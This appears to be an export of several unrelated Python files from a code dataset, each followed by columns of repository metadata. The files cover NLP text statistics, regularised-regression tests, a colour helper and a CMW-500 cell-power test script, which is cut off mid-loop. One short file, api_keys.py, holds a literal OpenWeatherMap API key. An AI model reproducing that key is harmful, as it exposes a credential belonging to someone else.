Ref: https://www.tandfonline.com/doi/abs/10.1080/02687038.2017.1303441
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the type-token statistic
Args:
None
Returns:
The ratio of the number of word types to the number of words
"""
all_words = []
all_word_lemmas = []
for so in self.sentence_objs:
all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
all_word_lemmas.extend(
[word.lemma for word in so.stanza_doc.sentences[0].words]
)
num_word_types = len(set(all_word_lemmas))
num_words = len(all_words)
return num_word_types / num_words
class Word_Length(object):
"""Class to calculate the mean word length
Ref: https://pubmed.ncbi.nlm.nih.gov/26484921/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the mean word length
Args:
None
Returns:
The mean length of the word across all sentences
"""
all_words = []
for so in self.sentence_objs:
all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
mean_word_length = np.mean([len(word) for word in all_words])
return mean_word_length
def lexico_semantic_feature_processor(sentence_objs, feature, **kwArgs):
"""This method Returns the lexico semantic features across all the sentences depending on the type of feature requested
Args:
sentence_objs (list<Sentence>): a list of Sentence objects
feature (str): a string name for the requested feature
Returns:
the feature value
"""
nr = globals()[feature.title()](sentence_objs)
return nr.handle()
| 34.210056
| 130
| 0.617839
| 4,035
| 30,618
| 4.416357
| 0.052045
| 0.06936
| 0.089787
| 0.045791
| 0.880022
| 0.854153
| 0.801627
| 0.78743
| 0.78064
| 0.76257
| 0
| 0.015642
| 0.30469
| 30,618
| 894
| 131
| 34.248322
| 0.82141
| 0.337971
| 0
| 0.672634
| 0
| 0
| 0.001372
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.171356
| false
| 0
| 0.017903
| 0
| 0.375959
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9c1aa58d7a422c7d917666977fae695aec1830da
| 70
|
py
|
Python
|
starter_code/api_keys.py
|
shuotang642/Python-APIs-Challenge
|
52cf9cc274faa2cb54b7c18f6302d4ebfc0f4cb8
|
[
"ADSL"
] | null | null | null |
starter_code/api_keys.py
|
shuotang642/Python-APIs-Challenge
|
52cf9cc274faa2cb54b7c18f6302d4ebfc0f4cb8
|
[
"ADSL"
] | null | null | null |
starter_code/api_keys.py
|
shuotang642/Python-APIs-Challenge
|
52cf9cc274faa2cb54b7c18f6302d4ebfc0f4cb8
|
[
"ADSL"
] | null | null | null |
# OpenWeatherMap API Key
api_key = "2b5d420394a2cb8a1fed6e5574203e5f"
| 23.333333
| 44
| 0.842857
| 6
| 70
| 9.666667
| 0.666667
| 0.206897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.31746
| 0.1
| 70
| 2
| 45
| 35
| 0.603175
| 0.314286
| 0
| 0
| 0
| 0
| 0.695652
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9c41e7cae8f83e7e62dea71f2778af233b57503e
| 44
|
py
|
Python
|
ui/source/generateSecret.py
|
rpiskule-lewis/devops-task-server
|
34993152efc0ca1ac15594482102b997a17cac9d
|
[
"Apache-2.0"
] | 1
|
2021-02-01T20:06:16.000Z
|
2021-02-01T20:06:16.000Z
|
ui/source/generateSecret.py
|
rpiskule-lewis/devops-task-server
|
34993152efc0ca1ac15594482102b997a17cac9d
|
[
"Apache-2.0"
] | null | null | null |
ui/source/generateSecret.py
|
rpiskule-lewis/devops-task-server
|
34993152efc0ca1ac15594482102b997a17cac9d
|
[
"Apache-2.0"
] | null | null | null |
import secrets
print(secrets.token_hex(32))
| 14.666667
| 28
| 0.818182
| 7
| 44
| 5
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04878
| 0.068182
| 44
| 2
| 29
| 22
| 0.804878
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
9c4f865f6bbc17c71d282ae07e6b7f2390aae9d7
| 14,020
|
py
|
Python
|
plasticnet/tests/test_solvers_functional.py
|
donovanr/plastic_net
|
28801059133e3f73359c5787ad235eac6c7e77ee
|
[
"MIT"
] | 1
|
2018-07-29T00:09:48.000Z
|
2018-07-29T00:09:48.000Z
|
plasticnet/tests/test_solvers_functional.py
|
donovanr/plasticnet
|
28801059133e3f73359c5787ad235eac6c7e77ee
|
[
"MIT"
] | 28
|
2018-07-11T21:35:05.000Z
|
2018-07-26T18:10:45.000Z
|
plasticnet/tests/test_solvers_functional.py
|
donovanr/plastic_net
|
28801059133e3f73359c5787ad235eac6c7e77ee
|
[
"MIT"
] | 2
|
2018-10-16T17:21:25.000Z
|
2019-12-23T06:45:55.000Z
|
import numpy as np
from sklearn import linear_model
from sklearn.preprocessing import scale
from sklearn.datasets import make_regression
from plasticnet.solvers.functional import (
ordinary_least_squares,
ridge,
lasso,
elastic_net,
general_plastic_net,
plastic_ridge,
plastic_lasso,
hard_plastic_net,
soft_plastic_net,
unified_plastic_net,
)
def test_ordinary_least_squares_explicit(N=1500, D=1000, tol=1e-12, max_iter=10000):
r"""Test explicitly coded special case OLS numba code in :meth:`plasticnet.solvers.functional.ordinary_least_squares` against sklearn LinearRegression."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N, coef=True
)
X, y = scale(X), scale(y)
lm = linear_model.LinearRegression()
lm.fit(X, y)
beta = ordinary_least_squares(X, y, tol=tol, max_iter=max_iter)
np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)
def test_ridge_explicit(N=500, D=1000, tol=1e-12, max_iter=10000):
r"""Test explicitly coded special case ridge numba code in :meth:`plasticnet.solvers.functional.ridge` against sklearn elastic net with l1_ratio=0."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N, coef=True
)
X, y = scale(X), scale(y)
lambda_total = np.random.exponential()
lm = linear_model.Ridge(alpha=lambda_total * N, tol=tol, max_iter=max_iter)
lm.fit(X, y)
beta = ridge(X, y, lambda_total=lambda_total, tol=tol, max_iter=max_iter)
np.testing.assert_almost_equal(beta, lm.coef_, decimal=4)
def test_lasso_explicit(N=500, D=1000, tol=1e-12, max_iter=10000):
r"""Test explicitly coded special case lasso numba code in :meth:`plasticnet.solvers.functional.lasso` against sklearn elastic net with `l1_ratio=1`."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N, coef=True
)
X, y = scale(X), scale(y)
lambda_total = np.random.exponential()
lm = linear_model.ElasticNet(
alpha=lambda_total, l1_ratio=1.0, tol=tol, max_iter=max_iter
)
lm.fit(X, y)
beta = lasso(X, y, lambda_total=lambda_total, tol=tol, max_iter=max_iter)
np.testing.assert_almost_equal(beta, lm.coef_, decimal=4)
def test_elastic_net_explicit_ordinary_least_squares(
N=1500, D=1000, tol=1e-12, max_iter=10000
):
r"""Test explicitly coded special case elastic net with :math:`\lambda=0` in :meth:`plasticnet.solvers.functional.elastic_net` against sklearn LinearRegression."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N, coef=True
)
X, y = scale(X), scale(y)
lm = linear_model.LinearRegression()
lm.fit(X, y)
beta = elastic_net(X, y, lambda_total=0.0, alpha=0.0, tol=tol, max_iter=max_iter)
np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)
def test_elastic_net_explicit(N=500, D=1000, tol=1e-12, max_iter=10000):
r"""Test explicitly coded elastic net in :meth:`plasticnet.solvers.functional.elastic_net` against sklearn ElasticNet."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N // 10, coef=True
)
X, y = scale(X), scale(y)
lambda_total = np.random.exponential()
alpha = np.random.rand()
elastic_net_lm = linear_model.ElasticNet(
alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
)
elastic_net_lm.fit(X, y)
beta = elastic_net(
X, y, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
)
np.testing.assert_almost_equal(elastic_net_lm.coef_, beta, decimal=4)
def test_ordinary_least_squares_general(N=1500, D=1000, tol=1e-12, max_iter=10000):
r"""Test OLS (:math:`\lambda=0` in :meth:`plasticnet.solvers.functional.general_plastic_net`) against sklearn LinearRegression."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N // 10, coef=True
)
X, y = scale(X), scale(y)
lambda_total = 0.0
alpha = 0.0
xi = np.zeros(D, dtype=np.float64)
zeta = np.zeros(D, dtype=np.float64)
lm = linear_model.LinearRegression()
lm.fit(X, y)
beta = general_plastic_net(
X,
y,
xi,
zeta,
lambda_total=lambda_total,
alpha=alpha,
tol=tol,
max_iter=max_iter,
)
np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)
def test_elastic_net_general(N=500, D=1000, tol=1e-12, max_iter=10000):
r"""Test elastic net (:math:`\xi=0` and :math:`\zeta=0` in :meth:`plasticnet.solvers.functional.general_plastic_net`) against sklearn ElasticNet."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N // 10, coef=True
)
X, y = scale(X), scale(y)
lambda_total = np.random.exponential()
alpha = np.random.rand()
xi = np.zeros(D, dtype=np.float64)
zeta = np.zeros(D, dtype=np.float64)
lm = linear_model.ElasticNet(
alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
)
lm.fit(X, y)
beta = general_plastic_net(
X,
y,
xi,
zeta,
lambda_total=lambda_total,
alpha=alpha,
tol=tol,
max_iter=max_iter,
)
np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)
def test_plastic_ridge_trivial(N=500, D=1000, tol=1e-12, max_iter=10000):
r"""Test plastic ridge(:math:`\zeta=0` in :meth:`plasticnet.solvers.functional.plastic_ridge`) against sklearn ElasticNet."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N // 10, coef=True
)
X, y = scale(X), scale(y)
lambda_total = np.random.exponential()
zeta = np.zeros(D, dtype=np.float64)
lm = linear_model.Ridge(alpha=lambda_total * N, tol=tol, max_iter=max_iter)
lm.fit(X, y)
beta = plastic_ridge(
X, y, zeta, lambda_total=lambda_total, tol=tol, max_iter=max_iter
)
np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)
def test_plastic_ridge_real(N=500, D=1000, tol=1e-12, max_iter=10000):
r"""Test :meth:`plasticnet.solvers.functional.plastic_ridge` against sklearn ElasticNet with transformed variables."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N // 10, coef=True
)
X, y = scale(X), scale(y)
lambda_total = np.random.exponential()
zeta = np.random.randn(D).astype(np.float64)
X_prime = X
y_prime = y - np.dot(X, zeta)
lm = linear_model.Ridge(alpha=lambda_total * N, tol=tol, max_iter=max_iter)
lm.fit(X_prime, y_prime)
beta_lm = lm.coef_ + zeta
beta = plastic_ridge(
X, y, zeta, lambda_total=lambda_total, tol=tol, max_iter=max_iter
)
np.testing.assert_almost_equal(beta_lm, beta, decimal=4)
def test_plastic_lasso_trivial(N=500, D=1000, tol=1e-12, max_iter=10000):
r"""Test plastic lasso (:math:`\xi=0` in :meth:`plasticnet.solvers.functional.plastic_lasso`) against sklearn ElasticNet."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N // 10, coef=True
)
X, y = scale(X), scale(y)
lambda_total = np.random.exponential()
xi = np.zeros(D, dtype=np.float64)
lm = linear_model.ElasticNet(
alpha=lambda_total, l1_ratio=1, tol=tol, max_iter=max_iter
)
lm.fit(X, y)
beta = plastic_lasso(
X, y, xi, lambda_total=lambda_total, tol=tol, max_iter=max_iter
)
np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)
def test_plastic_lasso_real(N=500, D=1000, tol=1e-12, max_iter=10000):
r"""Test :meth:`plasticnet.solvers.functional.plastic_lasso` against sklearn ElasticNet with transformed variables."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N // 10, coef=True
)
X, y = scale(X), scale(y)
lambda_total = np.random.exponential()
xi = np.random.randn(D).astype(np.float64)
X_prime = X
y_prime = y - np.dot(X, xi)
lm = linear_model.ElasticNet(
alpha=lambda_total, l1_ratio=1, tol=tol, max_iter=max_iter
)
lm.fit(X_prime, y_prime)
beta_lm = lm.coef_ + xi
beta = plastic_lasso(
X, y, xi, lambda_total=lambda_total, tol=tol, max_iter=max_iter
)
np.testing.assert_almost_equal(beta_lm, beta, decimal=4)
def test_hard_plastic_net_trivial(N=500, D=1000, tol=1e-12, max_iter=10000):
r"""Test hard plastic net (:math:`\xi=0` and in :meth:`plasticnet.solvers.functional.hard_plastic_net`) against sklearn ElasticNet."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N // 10, coef=True
)
X, y = scale(X), scale(y)
lambda_total = np.random.exponential()
alpha = np.random.rand()
xi = np.zeros(D, dtype=np.float64)
lm = linear_model.ElasticNet(
alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
)
lm.fit(X, y)
beta = hard_plastic_net(
X, y, xi, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
)
np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)
def test_hard_plastic_net_limiting_cases(N=500, D=1000, tol=1e-12, max_iter=10000):
r"""Test hard plastic net :meth:`plasticnet.solvers.functional.hard_plastic_net` against sklearn ElasticNet in limiting cases."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N // 10, coef=True
)
X, y = scale(X), scale(y)
lambda_total = np.random.exponential()
xi = np.random.randn(D).astype(np.float64)
X_prime = X
y_prime = y - np.dot(X, xi)
alpha = 1.0
lm = linear_model.ElasticNet(
alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
)
lm.fit(X_prime, y_prime)
beta_lm = lm.coef_ + xi
beta = hard_plastic_net(
X, y, xi, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
)
np.testing.assert_almost_equal(beta_lm, beta, decimal=4)
alpha = 0.0
lm = linear_model.Ridge(alpha=lambda_total * N, tol=tol, max_iter=max_iter)
lm.fit(X, y)
beta_lm = lm.coef_
beta = hard_plastic_net(
X, y, xi, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
)
np.testing.assert_almost_equal(beta_lm, beta, decimal=4)
def test_soft_plastic_net_trivial(N=500, D=1000, tol=1e-12, max_iter=10000):
r"""Test soft plastic net (:math:`\zeta=0` in :meth:`plasticnet.solvers.functional.soft_plastic_net`) against sklearn ElasticNet."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N // 10, coef=True
)
X, y = scale(X), scale(y)
lambda_total = np.random.exponential()
alpha = np.random.rand()
zeta = np.zeros(D, dtype=np.float64)
lm = linear_model.ElasticNet(
alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
)
lm.fit(X, y)
beta = soft_plastic_net(
X, y, zeta, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
)
np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)
def test_soft_plastic_net_limiting_cases(N=500, D=1000, tol=1e-12, max_iter=10000):
r"""Test :meth:`plasticnet.solvers.functional.soft_plastic_net` against sklearn ElasticNet in limiting cases."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N // 10, coef=True
)
X, y = scale(X), scale(y)
lambda_total = np.random.exponential()
zeta = np.random.randn(D).astype(np.float64)
alpha = 1.0
lm = linear_model.ElasticNet(
alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
)
lm.fit(X, y)
beta_lm = lm.coef_
beta = soft_plastic_net(
X, y, zeta, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
)
np.testing.assert_almost_equal(beta_lm, beta, decimal=4)
alpha = 0.0
X_prime = X
y_prime = y - np.dot(X, zeta)
lm = linear_model.Ridge(alpha=lambda_total * N, tol=tol, max_iter=max_iter)
lm.fit(X_prime, y_prime)
beta_lm = lm.coef_ + zeta
beta = soft_plastic_net(
X, y, zeta, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
)
np.testing.assert_almost_equal(beta_lm, beta, decimal=4)
def test_unified_plastic_net_trivial(N=500, D=1000, tol=1e-12, max_iter=10000):
r"""Test unified plastic net (:math:`\xi=0` in :meth:`plasticnet.solvers.functional.unified_plastic_net`) against sklearn ElasticNet."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N // 10, coef=True
)
X, y = scale(X), scale(y)
lambda_total = np.random.exponential()
alpha = np.random.rand()
xi = np.zeros(D, dtype=np.float64)
lm = linear_model.ElasticNet(
alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
)
lm.fit(X, y)
beta = unified_plastic_net(
X, y, xi, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
)
np.testing.assert_almost_equal(lm.coef_, beta, decimal=4)
def test_unified_plastic_net_real(N=500, D=1000, tol=1e-12, max_iter=10000):
r"""Test :meth:`plasticnet.solvers.functional.unified_plastic_net` against sklearn ElasticNet with transformed variables."""
X, y, beta_true = make_regression(
n_samples=N, n_features=D, n_informative=N // 10, coef=True
)
X, y = scale(X), scale(y)
lambda_total = np.random.exponential()
alpha = np.random.rand()
xi = np.random.randn(D).astype(np.float64)
X_prime = X
y_prime = y - np.dot(X, xi)
lm = linear_model.ElasticNet(
alpha=lambda_total, l1_ratio=alpha, tol=tol, max_iter=max_iter
)
lm.fit(X_prime, y_prime)
beta_lm = lm.coef_ + xi
beta = unified_plastic_net(
X, y, xi, lambda_total=lambda_total, alpha=alpha, tol=tol, max_iter=max_iter
)
np.testing.assert_almost_equal(beta_lm, beta, decimal=4)
| 30.745614
| 167
| 0.677817
| 2,200
| 14,020
| 4.094091
| 0.045455
| 0.067614
| 0.034973
| 0.050516
| 0.944044
| 0.934939
| 0.934939
| 0.906406
| 0.892306
| 0.870989
| 0
| 0.033256
| 0.19572
| 14,020
| 455
| 168
| 30.813187
| 0.76552
| 0.154565
| 0
| 0.667712
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059561
| 1
| 0.053292
| false
| 0
| 0.015674
| 0
| 0.068966
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
92caa188d3455fb13396e2dda05d84cfd2136dac
| 41
|
py
|
Python
|
misc/ranger_metaindex/__init__.py
|
vonshednob/metaindex
|
d20c043d81f353d0593af77d0cb8046aebbe3cf1
|
[
"MIT"
] | 4
|
2022-01-12T14:25:49.000Z
|
2022-01-29T08:10:04.000Z
|
misc/ranger_metaindex/__init__.py
|
vonshednob/metaindex
|
d20c043d81f353d0593af77d0cb8046aebbe3cf1
|
[
"MIT"
] | null | null | null |
misc/ranger_metaindex/__init__.py
|
vonshednob/metaindex
|
d20c043d81f353d0593af77d0cb8046aebbe3cf1
|
[
"MIT"
] | null | null | null |
from .linemode import MetaIndexLinemode
| 13.666667
| 39
| 0.853659
| 4
| 41
| 8.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121951
| 41
| 2
| 40
| 20.5
| 0.972222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13063d80805df543b6de4e92125bddc74cd29054
| 275
|
py
|
Python
|
randomColor.py
|
ombe1229/UsefulThings
|
629655f35764eb490016df7d0bd1bdd024444fd1
|
[
"WTFPL"
] | null | null | null |
randomColor.py
|
ombe1229/UsefulThings
|
629655f35764eb490016df7d0bd1bdd024444fd1
|
[
"WTFPL"
] | null | null | null |
randomColor.py
|
ombe1229/UsefulThings
|
629655f35764eb490016df7d0bd1bdd024444fd1
|
[
"WTFPL"
] | 1
|
2021-01-21T10:34:18.000Z
|
2021-01-21T10:34:18.000Z
|
import random
def random_hex():
result = ""
for _ in "RGB":
i = random.randrange(0, 2**8)
result += i.to_bytes(1, "big").hex()
return result
def random_rgb():
return (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))
| 19.642857
| 83
| 0.592727
| 40
| 275
| 3.975
| 0.5
| 0.245283
| 0.264151
| 0.320755
| 0.320755
| 0.320755
| 0.320755
| 0.320755
| 0
| 0
| 0
| 0.076555
| 0.24
| 275
| 13
| 84
| 21.153846
| 0.684211
| 0
| 0
| 0
| 0
| 0
| 0.021818
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0.111111
| 0.555556
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
133d31149b52bc82f62935af5c69f9ce078a11f3
| 10,563
|
py
|
Python
|
cellPowerManager.py
|
GCFprojects/Automation-tool-for-CMW-500
|
4a8917439af71ebef864142bfde27339f553ef9a
|
[
"MIT"
] | null | null | null |
cellPowerManager.py
|
GCFprojects/Automation-tool-for-CMW-500
|
4a8917439af71ebef864142bfde27339f553ef9a
|
[
"MIT"
] | null | null | null |
cellPowerManager.py
|
GCFprojects/Automation-tool-for-CMW-500
|
4a8917439af71ebef864142bfde27339f553ef9a
|
[
"MIT"
] | 1
|
2019-01-15T09:56:40.000Z
|
2019-01-15T09:56:40.000Z
|
from PyQt4.QtCore import QThread
import visa
import time
class CellPowerTest(QThread):
def __init__(self, channel_to_test, connect_address='', cell_test_loop=1,
cell_1_power_min=-145, cell_1_power_max=-46,
cell_1_step=1, cell_1_time=1,
cell_2_power_min=-145, cell_2_power_max=-46,
cell_2_step=1, cell_2_time=1,
parent=None):
super(CellPowerTest, self).__init__(parent)
self.connect_address = connect_address
self.rm = visa.ResourceManager()
self.cmw_connection = self.rm.open_resource(self.connect_address)
self.channel_to_test = channel_to_test
self.cell_test_loop = cell_test_loop
if channel_to_test == '0' or channel_to_test == '1':
self.cell_1_power_min = cell_1_power_min
self.cell_1_power_max = cell_1_power_max
self.cell_1_step = cell_1_step
self.cell_1_time = cell_1_time
if channel_to_test == '0' or channel_to_test == '2':
self.cell_2_power_min = cell_2_power_min
self.cell_2_power_max = cell_2_power_max
self.cell_2_step = cell_2_step
self.cell_2_time = cell_2_time
def run(self):
# print(self.connect_address)
# self.connect_to_cmw()
self.attenuation_test()
def connect_to_cmw(self):
print(self.cmw_connection.query("*IDN?"))
self.cmw_connection.clear()
self.cmw_connection.timeout = 2000
self.cmw_connection.write("CONFigure:LTE:SIGN1:DL:PCC:RSEPre:LEVel?")
print(self.cmw_connection.read())
self.cmw_connection.clear()
def attenuation_test(self):
self.cmw_connection.clear()
for i in range(int(self.cell_test_loop)):
# Jeżeli user zaznaczył dwa kanały uruchom test '0'
if self.channel_to_test == '0':
cell_1_flag = float(self.cell_1_power_min)
cell_2_flag = float(self.cell_2_power_min)
steps_for_cell_1 = (float(self.cell_1_power_min) - float(self.cell_1_power_max)) / float(
self.cell_1_step)
steps_for_cell_2 = (float(self.cell_2_power_min) - float(self.cell_2_power_max)) / float(
self.cell_2_step)
if steps_for_cell_1 < 0:
steps_for_cell_1 = -steps_for_cell_1
if steps_for_cell_2 < 0:
steps_for_cell_2 = -steps_for_cell_2
if steps_for_cell_1 <= steps_for_cell_2:
if (self.cell_1_power_min <= self.cell_2_power_min) and \
(self.cell_1_power_max >= self.cell_2_power_max):
step = 1
for item in range(int(steps_for_cell_1 + 1)):
print('---------------Loop: ' + str(i + 1) + ' Step: ' + str(step) + '---------------')
self.manage_cell_1_power(cell_1_flag)
self.manage_cell_2_power(cell_2_flag)
cell_1_flag += float(self.cell_1_step)
cell_2_flag -= float(self.cell_2_step)
step += 1
time.sleep(float(self.cell_1_time))
cell_1_flag = float(self.cell_1_power_max)
cell_2_flag = float(self.cell_2_power_max)
for item in range(int(steps_for_cell_1 + 1)):
print('---------------Loop: ' + str(i + 1) + ' Step: ' + str(step) + '---------------')
self.manage_cell_1_power(cell_1_flag)
self.manage_cell_2_power(cell_2_flag)
cell_1_flag -= float(self.cell_1_step)
cell_2_flag += float(self.cell_2_step)
step += 1
time.sleep(float(self.cell_1_time))
elif (self.cell_1_power_min >= self.cell_2_power_min) and \
(self.cell_1_power_max <= self.cell_2_power_max):
step = 0
for item in range(int(steps_for_cell_1 + 1)):
print('---------------Loop: ' + str(i + 1) + ' Step: ' + str(step) + '---------------')
self.manage_cell_1_power(cell_1_flag)
self.manage_cell_2_power(cell_2_flag)
cell_1_flag -= float(self.cell_1_step)
cell_2_flag += float(self.cell_2_step)
step += 1
time.sleep(float(self.cell_1_time))
cell_1_flag = float(self.cell_1_power_max)
cell_2_flag = float(self.cell_2_power_max)
for item in range(int(steps_for_cell_1 + 1)):
print('---------------Loop: ' + str(i + 1) + ' Step: ' + str(step) + '---------------')
self.manage_cell_1_power(cell_1_flag)
self.manage_cell_2_power(cell_2_flag)
cell_1_flag += float(self.cell_1_step)
cell_2_flag -= float(self.cell_2_step)
step += 1
time.sleep(float(self.cell_1_time))
# Jeżeli user zaznaczył tylko kanał pierwszy uruchom test '1'
elif self.channel_to_test == '1':
cell_1_flag = float(self.cell_1_power_min)
item = 1
while float(self.cell_1_power_min) <= cell_1_flag and float(self.cell_1_power_max) >= cell_1_flag:
print('--------------- Loop: ' + str(i+1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_1_power(cell_1_flag)
cell_1_flag = float(cell_1_flag) + float(self.cell_1_step)
item += 1
time.sleep(float(self.cell_1_time))
while float(self.cell_1_power_min) >= cell_1_flag and float(self.cell_1_power_max) <= cell_1_flag:
print('--------------- Loop: ' + str(i + 1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_1_power(cell_1_flag)
cell_1_flag = float(cell_1_flag) - float(self.cell_1_step)
item += 1
time.sleep(float(self.cell_1_time))
cell_1_flag = float(self.cell_1_power_max)
while float(self.cell_1_power_min) <= cell_1_flag and float(self.cell_1_power_max) >= cell_1_flag:
print('--------------- Loop: ' + str(i+1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_1_power(cell_1_flag)
cell_1_flag = float(cell_1_flag) - float(self.cell_1_step)
item += 1
time.sleep(float(self.cell_1_time))
while float(self.cell_1_power_min) >= cell_1_flag and float(self.cell_1_power_max) <= cell_1_flag:
print('--------------- Loop: ' + str(i+1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_1_power(cell_1_flag)
cell_1_flag = float(cell_1_flag) + float(self.cell_1_step)
item += 1
time.sleep(float(self.cell_1_time))
# Jeżeli user zaznaczył tylko kanał drugi uruchom test '2'
elif self.channel_to_test == '2':
item = 1
cell_2_flag = float(self.cell_2_power_min)
while float(self.cell_2_power_min) <= cell_2_flag and float(self.cell_2_power_max) >= cell_2_flag:
print('--------------- Loop: ' + str(i+1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_2_power(cell_2_flag)
cell_2_flag = float(cell_2_flag) + float(self.cell_2_step)
item += 1
time.sleep(float(self.cell_2_time))
while float(self.cell_2_power_min) >= cell_2_flag and float(self.cell_2_power_max) <= cell_2_flag:
print('--------------- Loop: ' + str(i + 1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_2_power(cell_2_flag)
cell_2_flag = float(cell_2_flag) - float(self.cell_2_step)
item += 1
time.sleep(float(self.cell_2_time))
cell_2_flag = float(self.cell_2_power_max)
while float(self.cell_2_power_min) <= cell_2_flag and float(self.cell_2_power_max) >= cell_2_flag:
print('--------------- Loop: ' + str(i+1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_2_power(cell_2_flag)
cell_2_flag = float(cell_2_flag) - float(self.cell_2_step)
item += 1
time.sleep(float(self.cell_2_time))
while float(self.cell_2_power_min) >= cell_2_flag and float(self.cell_2_power_max) <= cell_2_flag:
print('--------------- Loop: ' + str(i+1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_2_power(cell_2_flag)
cell_2_flag = float(cell_2_flag) + float(self.cell_2_step)
item += 1
